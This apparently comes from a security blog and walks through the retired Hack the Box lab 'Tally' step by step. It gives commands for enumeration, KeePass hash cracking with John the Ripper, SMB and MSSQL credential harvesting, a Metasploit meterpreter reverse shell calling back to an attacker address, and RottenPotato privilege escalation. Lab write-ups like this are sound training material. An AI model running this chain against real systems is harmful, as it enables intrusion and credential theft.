Hello Friends!! Today we are going to solve a CTF Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.
Task: Find the user.txt and root.txt in the vulnerable Lab.
As these labs are only available online, therefore, they have a static IP. Tally Lab has IP: 10.10.10.59.
Now, as always let’s begin our hacking with the port enumeration.
nmap -p- -A 10.10.10.59
When you will explore target IP through the browser, it will be redirected to a SharePoint page as shown below which also declared by nmap in above image.
Then we have used several directory brute-forcer tools in order to enumerate some useful URL for web directory but failed to retrieve. Then I penetrate for the web directory manually with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found ftp username as shown below in the image.
Moreover, I found a link for SharePoint directory brute-force attack that helps me in my next step.
We found this URL http://10.10.10.59/shared documents/forms/allitems.aspx from inside above-given link, and when you will open above path in your browser as shown below, you will see a file named “ftp-details”. Download this doc file and open it.
You will get a password from inside ftp details doc file.
Now login into FTP using following credentials and download tim.kdbx in your local machine.
Since the file contains .kdbx extension and I don’t know much about it, therefore, I jumped for Google search from there I got this link to download a python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.
python keepass2john.py tim.kdbx > tim
Next, we have used John the ripper for decrypting the content of “tim” with help of the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
When you will obtain the password for “keepass2” which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command:
apt-get install keepass2 -y
After installing, run the below command and submit “simplementeyo” in the field of the master key.
Then you can find username and password from inside /Work/Windows/Shares for sharing a file through SMB login, since port 135-445 are open in targets machine for sharing files.
Here the password is hidden inside * character; copy and paste it into a text file and you will get the password into plain letters I.e. Acc0unting .
Now you are having SMB login credential “Finance: Acc0unting”, then execute following command for connecting with targets network and It will show “ACCT” as sharename.
smbclient -L 10.10.10.59 -U Finance
Further type below commands and at last when you found conn-info.txt, download it.
smbclient //10.10.10.59/ACCT -U Finance
When you will download conn-info.txt file, open it, it will tell you MSSQL database login credential.
From below image you can observe that, it was old server details and might be the password for sa has been changed now.
Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to execute below commands:
smbclient //10.10.10.59/ACCT -U Finance
cd "New folder"
Here you will found tester.exe, download it.
You will get tester.exe inside your /root directory since the file is too large, it is impossible to find desirable information from that. Therefore use grep along with strings command.
strings tester.exe | grep DATABASE
And you will get a new password for user sa as shown in below image.
For next step I took help from our previous article which was on MSSQL penetration testing. Open a new terminal and load metasploit framework and execute below commands.
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for .dll and Paste it inside as CMD command as shown in next image.
Now open new terminal and again load a new metasploit framework and execute below commands.
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit
You will get meterpreter session of victim’s machine in your 1st metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:
So currently we don’t have NT AUTHORITY\SYSTEM permission.
But we have successfully grabbed user.txt file from inside /Sarah/Desktop.
In this way we have completed our first task. Now let’s find root.txt!!
Incognito option in meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system
If we talk related to impersonate token then you can see currently there is no token available.
Then I took help from Google in such scenario and found a link for downloading Rottenpotato from github for privilege escalation.
git clone https://github.com/foxglovesec/RottenPotato.git
After downloading it will give rottenpotato.exe file.
Upload the exe file into victim’s machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
After then when you will run getuid command again, it will tell you that you have escalated NT AUTHORITY\\SYSTEM
Then come back to /Users directory and perceive available directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop go and grab it, and finished the task.
Fabulous!! The task has been completed and hacked this box.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Hack the Box Challenge: Tally Walkthrough appeared first on Hacking Articles.